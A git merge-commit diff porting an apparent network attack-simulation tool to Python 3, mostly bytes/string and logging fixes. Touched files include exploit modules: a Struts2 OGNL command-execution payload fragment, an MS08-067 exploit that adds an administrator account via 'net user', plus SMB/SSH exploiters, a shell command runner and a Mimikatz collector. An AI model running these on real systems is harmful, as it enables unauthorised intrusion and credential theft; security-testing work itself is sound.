Merge remote-tracking branch 'upstream/393/python-3' into deployment_scripts_python3

This commit is contained in:
VakarisZ 2019-10-23 14:47:43 +03:00
commit bcf428de1e
29 changed files with 100 additions and 109 deletions

View File

@ -27,16 +27,17 @@ class AwsInstance(object):
try:
self.instance_id = urllib.request.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read()
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read().decode()
self.region = self._parse_region(
urllib.request.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read())
urllib.request.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read().
decode())
except (urllib.error.URLError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e))
try:
self.account_id = self._extract_account_id(
urllib.request.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read())
AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read().decode())
except (urllib.error.URLError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e))

View File

@ -4,7 +4,6 @@ import struct
from abc import ABCMeta, abstractmethod
import ipaddress
from six import text_type
import logging
__author__ = 'itamar'
@ -78,7 +77,7 @@ class CidrRange(NetworkRange):
def __init__(self, cidr_range, shuffle=True):
super(CidrRange, self).__init__(shuffle=shuffle)
self._cidr_range = cidr_range.strip()
self._ip_network = ipaddress.ip_network(text_type(self._cidr_range), strict=False)
self._ip_network = ipaddress.ip_network(str(self._cidr_range), strict=False)
def __repr__(self):
return "<CidrRange %s>" % (self._cidr_range,)
@ -151,10 +150,10 @@ class SingleIpRange(NetworkRange):
return self._ip_address
@staticmethod
def string_to_host(string):
def string_to_host(string_):
"""
Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip
:param string: String that was entered in "Scan IP/subnet list"
:param string_: String that was entered in "Scan IP/subnet list"
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
"""
# The most common use case is to enter ip/range into "Scan IP/subnet list"
@ -162,16 +161,16 @@ class SingleIpRange(NetworkRange):
# Try casting user's input as IP
try:
ip = ipaddress.ip_address(string).exploded
ip = ipaddress.ip_address(string_).exploded
except ValueError:
# Exception means that it's a domain name
try:
ip = socket.gethostbyname(string)
domain_name = string
ip = socket.gethostbyname(string_)
domain_name = string_
except socket.error:
LOG.error("Your specified host: {} is not found as a domain name and"
" it's not an IP address".format(string))
return None, string
# If a string was entered instead of IP we presume that it was domain name and translate it
" it's not an IP address".format(string_))
return None, string_
# If a string_ was entered instead of IP we presume that it was domain name and translate it
return ip, domain_name

View File

@ -9,7 +9,7 @@ from requests.exceptions import ConnectionError
import infection_monkey.monkeyfs as monkeyfs
import infection_monkey.tunnel as tunnel
from infection_monkey.config import WormConfiguration, GUID
from infection_monkey.network.info import local_ips, check_internet_access, TIMEOUT
from infection_monkey.network.info import local_ips, check_internet_access
from infection_monkey.transport.http import HTTPConnectProxy
from infection_monkey.transport.tcp import TcpProxy
@ -85,7 +85,7 @@ class ControlClient(object):
except ConnectionError as exc:
current_server = ""
LOG.warn("Error connecting to control server %s: %s", server, exc)
LOG.warning("Error connecting to control server %s: %s", server, exc)
if current_server:
return True
@ -112,13 +112,13 @@ class ControlClient(object):
monkey = {}
if ControlClient.proxies:
monkey['tunnel'] = ControlClient.proxies.get('https')
reply = requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID),
requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID),
data=json.dumps(monkey),
headers={'content-type': 'application/json'},
verify=False,
proxies=ControlClient.proxies)
except Exception as exc:
LOG.warn("Error connecting to control server %s: %s",
LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc)
return {}
@ -129,13 +129,13 @@ class ControlClient(object):
return
try:
telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': data}
reply = requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,),
requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,),
data=json.dumps(telemetry),
headers={'content-type': 'application/json'},
verify=False,
proxies=ControlClient.proxies)
except Exception as exc:
LOG.warn("Error connecting to control server %s: %s",
LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc)
@staticmethod
@ -144,13 +144,13 @@ class ControlClient(object):
return
try:
telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)}
reply = requests.post("https://%s/api/log" % (WormConfiguration.current_server,),
requests.post("https://%s/api/log" % (WormConfiguration.current_server,),
data=json.dumps(telemetry),
headers={'content-type': 'application/json'},
verify=False,
proxies=ControlClient.proxies)
except Exception as exc:
LOG.warn("Error connecting to control server %s: %s",
LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc)
@staticmethod
@ -163,7 +163,7 @@ class ControlClient(object):
proxies=ControlClient.proxies)
except Exception as exc:
LOG.warn("Error connecting to control server %s: %s",
LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc)
return
@ -191,7 +191,7 @@ class ControlClient(object):
verify=False,
proxies=ControlClient.proxies)
except Exception as exc:
LOG.warn("Error connecting to control server %s: %s", WormConfiguration.current_server, exc)
LOG.warning("Error connecting to control server %s: %s", WormConfiguration.current_server, exc)
return {}
@staticmethod
@ -261,7 +261,7 @@ class ControlClient(object):
return dest_file
except Exception as exc:
LOG.warn("Error connecting to control server %s: %s",
LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc)
@staticmethod
@ -288,7 +288,7 @@ class ControlClient(object):
return None, None
except Exception as exc:
LOG.warn("Error connecting to control server %s: %s",
LOG.warning("Error connecting to control server %s: %s",
WormConfiguration.current_server, exc)
return None, None

View File

@ -26,7 +26,7 @@ else:
try:
WindowsError
except NameError:
WindowsError = None
WindowsError = IOError
__author__ = 'itamar'
@ -104,14 +104,14 @@ class MonkeyDrops(object):
try:
ref_stat = os.stat(dropper_date_reference_path)
except OSError as exc:
LOG.warn("Cannot set reference date using '%s', file not found",
LOG.warning("Cannot set reference date using '%s', file not found",
dropper_date_reference_path)
else:
try:
os.utime(self._config['destination_path'],
(ref_stat.st_atime, ref_stat.st_mtime))
except:
LOG.warn("Cannot set reference date to destination file")
LOG.warning("Cannot set reference date to destination file")
monkey_options =\
build_monkey_commandline_explicitly(self.opts.parent, self.opts.tunnel, self.opts.server, self.opts.depth)
@ -135,7 +135,7 @@ class MonkeyDrops(object):
time.sleep(3)
if monkey_process.poll() is not None:
LOG.warn("Seems like monkey died too soon")
LOG.warning("Seems like monkey died too soon")
def cleanup(self):
try:

View File

@ -12,7 +12,8 @@ class HostExploiter(object, metaclass=ABCMeta):
# Usual values are 'vulnerability' or 'brute_force'
EXPLOIT_TYPE = ExploitType.VULNERABILITY
@abstractproperty
@property
@abstractmethod
def _EXPLOITED_SERVICE(self):
pass

View File

@ -10,7 +10,6 @@ from infection_monkey.exploit import HostExploiter
from infection_monkey.exploit.tools.http_tools import MonkeyHTTPServer
from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, build_monkey_commandline, get_monkey_depth
from infection_monkey.model import DROPPER_ARG
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
from infection_monkey.exploit.tools.exceptions import ExploitingVulnerableMachineError

View File

@ -217,6 +217,7 @@ class SambaCryExploiter(HostExploiter):
pattern = re.compile(r'\d*\.\d*\.\d*')
smb_server_name = self.host.services[SMB_SERVICE].get('name')
if not smb_server_name:
LOG.info("Host: %s refused SMB connection" % self.host.ip_addr)
return False
samba_version = "unknown"
pattern_result = pattern.search(smb_server_name)

View File

@ -125,7 +125,7 @@ class SmbExploiter(HostExploiter):
try:
scmr_rpc.connect()
except Exception as exc:
LOG.warn("Error connecting to SCM on exploited machine %r: %s",
LOG.warning("Error connecting to SCM on exploited machine %r: %s",
self.host, exc)
return False

View File

@ -124,7 +124,7 @@ class SSHExploiter(HostExploiter):
if not self.host.os.get('type'):
try:
_, stdout, _ = ssh.exec_command('uname -o')
uname_os = stdout.read().lower().strip()
uname_os = stdout.read().lower().strip().decode()
if 'linux' in uname_os:
self.host.os['type'] = 'linux'
else:

View File

@ -79,9 +79,6 @@ class Struts2Exploiter(WebRCE):
"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \
"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \
"(#ros.flush())}" % cmd
# Turns payload ascii just for consistency
if isinstance(payload, str):
payload = unicodedata.normalize('NFKD', payload).encode('ascii', 'ignore')
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
try:
request = urllib.request.Request(url, headers=headers)
@ -91,6 +88,6 @@ class Struts2Exploiter(WebRCE):
# If url does not exist
return False
except http.client.IncompleteRead as e:
page = e.partial
page = e.partial.decode()
return page

View File

@ -191,11 +191,11 @@ class Ms08_067_Exploiter(HostExploiter):
try:
sock = exploit.start()
sock.send("cmd /c (net user %s %s /add) &&"
" (net localgroup administrators %s /add)\r\n" %
(self._config.user_to_add,
sock.send("cmd /c (net user {} {} /add) &&"
" (net localgroup administrators {} /add)\r\n".format(
self._config.user_to_add,
self._config.remote_user_pass,
self._config.user_to_add))
self._config.user_to_add).encode())
time.sleep(2)
reply = sock.recv(1000)

View File

@ -6,7 +6,6 @@ import sys
import time
import infection_monkey.tunnel as tunnel
from infection_monkey.utils.environment import is_windows_os
from infection_monkey.utils.monkey_dir import create_monkey_dir, get_monkey_dir_path, remove_monkey_dir
from infection_monkey.utils.monkey_log_path import get_monkey_log_path
from infection_monkey.utils.environment import is_windows_os

View File

@ -1,4 +1,3 @@
import sys
import socket
import struct
import psutil

View File

@ -7,8 +7,6 @@ import struct
import time
import re
from six.moves import range
from infection_monkey.pyinstaller_utils import get_binary_file_path
from infection_monkey.utils.environment import is_64bit_python
@ -73,7 +71,7 @@ def check_tcp_port(ip, port, timeout=DEFAULT_TIMEOUT, get_banner=False):
if get_banner:
read_ready, _, _ = select.select([sock], [], [], timeout)
if len(read_ready) > 0:
banner = sock.recv(BANNER_READ)
banner = sock.recv(BANNER_READ).decode()
except socket.error:
pass

View File

@ -1,5 +1,4 @@
import logging
import os
import random
import string
import subprocess
@ -39,7 +38,7 @@ class CommunicateAsNewUser(PBA):
exit_status = new_user.run_as(ping_commandline)
self.send_ping_result_telemetry(exit_status, ping_commandline, username)
except subprocess.CalledProcessError as e:
PostBreachTelem(self, (e.output, False)).send()
PostBreachTelem(self, (e.output.decode(), False)).send()
except NewUserError as e:
PostBreachTelem(self, (str(e), False)).send()

View File

@ -14,6 +14,7 @@ __author__ = 'VakarisZ'
EXECUTION_WITHOUT_OUTPUT = "(PBA execution produced no output)"
class PBA(object):
"""
Post breach action object. Can be extended to support more than command execution on target machine.
@ -75,13 +76,13 @@ class PBA(object):
:return: Tuple of command's output string and boolean, indicating if it succeeded
"""
try:
output = subprocess.check_output(self.command, stderr=subprocess.STDOUT, shell=True)
output = subprocess.check_output(self.command, stderr=subprocess.STDOUT, shell=True).decode()
if not output:
output = EXECUTION_WITHOUT_OUTPUT
return output, True
except subprocess.CalledProcessError as e:
# Return error output of the command
return e.output, False
return e.output.decode(), False
@staticmethod
def choose_command(linux_cmd, windows_cmd):

View File

@ -6,7 +6,6 @@ odict
paramiko
psutil
PyInstaller
six
ecdsa
netifaces
ipaddress

View File

@ -6,7 +6,6 @@ odict
paramiko
psutil
PyInstaller
six
ecdsa
netifaces
ipaddress

View File

@ -1,6 +1,7 @@
import os
import logging
import sys
sys.coinit_flags = 0 # needed for proper destruction of the wmi python module
import infection_monkey.config
from infection_monkey.system_info.mimikatz_collector import MimikatzCollector
@ -8,9 +9,6 @@ from infection_monkey.system_info import InfoCollector
from infection_monkey.system_info.wmi_consts import WMI_CLASSES
from common.utils.wmi_utils import WMIUtils
sys.coinit_flags = 0 # needed for proper destruction of the wmi python module
LOG = logging.getLogger(__name__)
LOG.info('started windows info collector')

View File

@ -25,7 +25,8 @@ class BaseTelem(object, metaclass=abc.ABCMeta):
logger.debug("Sending {} telemetry. Data: {}".format(self.telem_category, json.dumps(data)))
ControlClient.send_telemetry(self.telem_category, data)
@abc.abstractproperty
@property
@abc.abstractmethod
def telem_category(self):
"""
:return: Telemetry type

View File

@ -48,7 +48,7 @@ def _check_tunnel(address, port, existing_sock=None):
return False
try:
sock.sendto("+", (address, MCAST_PORT))
sock.sendto(b"+", (address, MCAST_PORT))
except Exception as exc:
LOG.debug("Caught exception in tunnel registration: %s", exc)
@ -71,13 +71,13 @@ def find_tunnel(default=None, attempts=3, timeout=DEFAULT_TIMEOUT):
try:
LOG.info("Trying to find using adapter %s", adapter)
sock = _set_multicast_socket(timeout, adapter)
sock.sendto("?", (MCAST_GROUP, MCAST_PORT))
sock.sendto(b"?", (MCAST_GROUP, MCAST_PORT))
tunnels = []
while True:
try:
answer, address = sock.recvfrom(BUFFER_READ)
if answer not in ['?', '+', '-']:
if answer not in [b'?', b'+', b'-']:
tunnels.append(answer)
except socket.timeout:
break
@ -102,7 +102,7 @@ def find_tunnel(default=None, attempts=3, timeout=DEFAULT_TIMEOUT):
def quit_tunnel(address, timeout=DEFAULT_TIMEOUT):
try:
sock = _set_multicast_socket(timeout)
sock.sendto("-", (address, MCAST_PORT))
sock.sendto(b"-", (address, MCAST_PORT))
sock.close()
LOG.debug("Success quitting tunnel")
except Exception as exc:
@ -147,17 +147,17 @@ class MonkeyTunnel(Thread):
while not self._stopped:
try:
search, address = self._broad_sock.recvfrom(BUFFER_READ)
if '?' == search:
if b'?' == search:
ip_match = get_interface_to_target(address[0])
if ip_match:
answer = '%s:%d' % (ip_match, self.local_port)
LOG.debug("Got tunnel request from %s, answering with %s", address[0], answer)
self._broad_sock.sendto(answer, (address[0], MCAST_PORT))
elif '+' == search:
self._broad_sock.sendto(answer.encode(), (address[0], MCAST_PORT))
elif b'+' == search:
if not address[0] in self._clients:
LOG.debug("Tunnel control: Added %s to watchlist", address[0])
self._clients.append(address[0])
elif '-' == search:
elif b'-' == search:
LOG.debug("Tunnel control: Removed %s from watchlist", address[0])
self._clients = [client for client in self._clients if client != address[0]]
@ -170,7 +170,7 @@ class MonkeyTunnel(Thread):
while self._clients and (time.time() - get_last_serve_time() < QUIT_TIMEOUT):
try:
search, address = self._broad_sock.recvfrom(BUFFER_READ)
if '-' == search:
if b'-' == search:
LOG.debug("Tunnel control: Removed %s from watchlist", address[0])
self._clients = [client for client in self._clients if client != address[0]]
except socket.timeout:

View File

@ -48,7 +48,7 @@ class Monkey(Document):
@staticmethod
def __ring_key__():
"""
Cash key representation
Cache key representation
https://ring-cache.readthedocs.io/en/stable/quickstart.html#method-classmethod-staticmethod-property
:return:
"""

View File

@ -34,10 +34,10 @@ class RemoteRun(flask_restful.Resource):
try:
resp['instances'] = AwsService.get_instances()
except NoCredentialsError as e:
resp['error'] = NO_CREDS_ERROR_FORMAT.format(e.message)
resp['error'] = NO_CREDS_ERROR_FORMAT.format(e)
return jsonify(resp)
except ClientError as e:
resp['error'] = CLIENT_ERROR_FORMAT.format(e.message)
resp['error'] = CLIENT_ERROR_FORMAT.format(e)
return jsonify(resp)
return jsonify(resp)

View File

@ -12,28 +12,32 @@ logger = logging.getLogger(__name__)
class AttackTechnique(object, metaclass=abc.ABCMeta):
""" Abstract class for ATT&CK report components """
@abc.abstractproperty
@property
@abc.abstractmethod
def unscanned_msg(self):
"""
:return: Message that will be displayed in case attack technique was not scanned.
"""
pass
@abc.abstractproperty
@property
@abc.abstractmethod
def scanned_msg(self):
"""
:return: Message that will be displayed in case attack technique was scanned.
"""
pass
@abc.abstractproperty
@property
@abc.abstractmethod
def used_msg(self):
"""
:return: Message that will be displayed in case attack technique was used by the scanner.
"""
pass
@abc.abstractproperty
@property
@abc.abstractmethod
def tech_id(self):
"""
:return: Message that will be displayed in case of attack technique not being scanned.

View File

@ -3,7 +3,6 @@ import collections
import functools
import logging
from jsonschema import Draft4Validator, validators
from six import string_types
import monkey_island.cc.services.post_breach_files
from monkey_island.cc.database import mongo
@ -236,7 +235,7 @@ class ConfigService:
keys = [config_arr_as_array[2] for config_arr_as_array in ENCRYPTED_CONFIG_ARRAYS]
for key in keys:
if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], string_types):
if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], str):
# Check if we are decrypting ssh key pair
if flat_config[key] and isinstance(flat_config[key][0], dict) and 'public_key' in flat_config[key][0]:
flat_config[key] = [ConfigService.decrypt_ssh_key_pair(item) for item in flat_config[key]]
@ -257,7 +256,7 @@ class ConfigService:
parent_config_arr = config_arr
config_arr = config_arr[config_key_part]
if isinstance(config_arr, collections.Sequence) and not isinstance(config_arr, string_types):
if isinstance(config_arr, collections.Sequence) and not isinstance(config_arr, str):
for i in range(len(config_arr)):
# Check if array of shh key pairs and then decrypt
if isinstance(config_arr[i], dict) and 'public_key' in config_arr[i]:

View File

@ -1,4 +1,4 @@
WARNING_SIGN = " \\u26A0"
WARNING_SIGN = " \u26A0"
SCHEMA = {
"title": "Monkey",

View File

@ -155,7 +155,7 @@ class EdgeService:
else:
to_label = NodeService.get_node_label(NodeService.get_node_by_id(to_id))
RIGHT_ARROW = "\\u2192"
RIGHT_ARROW = "\u2192"
return "%s %s %s" % (from_label, RIGHT_ARROW, to_label)

View File

@ -5,7 +5,6 @@ import logging
import ipaddress
from bson import json_util
from enum import Enum
from six import text_type
from common.network.network_range import NetworkRange
from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst
@ -396,7 +395,7 @@ class ReportService:
return \
[
ipaddress.ip_interface(text_type(network['addr'] + '/' + network['netmask'])).network
ipaddress.ip_interface(str(network['addr'] + '/' + network['netmask'])).network
for network in network_info['data']['network_info']['networks']
]
@ -409,7 +408,7 @@ class ReportService:
monkey_subnets = ReportService.get_monkey_subnets(monkey['guid'])
for subnet in monkey_subnets:
for ip in island_ips:
if ipaddress.ip_address(text_type(ip)) in subnet:
if ipaddress.ip_address(str(ip)) in subnet:
found_good_ip = True
break
if found_good_ip:
@ -438,7 +437,7 @@ class ReportService:
ip_in_src = None
ip_in_dst = None
for ip_addr in monkey['ip_addresses']:
if source_subnet_range.is_in_range(text_type(ip_addr)):
if source_subnet_range.is_in_range(str(ip_addr)):
ip_in_src = ip_addr
break
@ -447,7 +446,7 @@ class ReportService:
continue
for ip_addr in monkey['ip_addresses']:
if target_subnet_range.is_in_range(text_type(ip_addr)):
if target_subnet_range.is_in_range(str(ip_addr)):
ip_in_dst = ip_addr
break
@ -483,7 +482,7 @@ class ReportService:
scans.rewind() # If we iterated over scans already we need to rewind.
for scan in scans:
target_ip = scan['data']['machine']['ip_addr']
if target_subnet_range.is_in_range(text_type(target_ip)):
if target_subnet_range.is_in_range(str(target_ip)):
monkey = NodeService.get_monkey_by_guid(scan['monkey_guid'])
cross_segment_ip = get_ip_in_src_and_not_in_dst(monkey['ip_addresses'],
source_subnet_range,

View File

@ -1,5 +1,4 @@
import itertools
from six import text_type
from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED
from common.network.network_range import NetworkRange
@ -34,8 +33,7 @@ def test_segmentation_violation(current_monkey, target_ip):
)
def is_segmentation_violation(current_monkey, target_ip, source_subnet, target_subnet):
# type: (Monkey, str, str, str) -> bool
def is_segmentation_violation(current_monkey: Monkey, target_ip: str, source_subnet: str, target_subnet: str) -> bool:
"""
Checks is a specific communication is a segmentation violation.
:param current_monkey: The source monkey which originated the communication.
@ -49,7 +47,7 @@ def is_segmentation_violation(current_monkey, target_ip, source_subnet, target_s
source_subnet_range = NetworkRange.get_range_obj(source_subnet)
target_subnet_range = NetworkRange.get_range_obj(target_subnet)
if target_subnet_range.is_in_range(text_type(target_ip)):
if target_subnet_range.is_in_range(str(target_ip)):
cross_segment_ip = get_ip_in_src_and_not_in_dst(
current_monkey.ip_addresses,
source_subnet_range,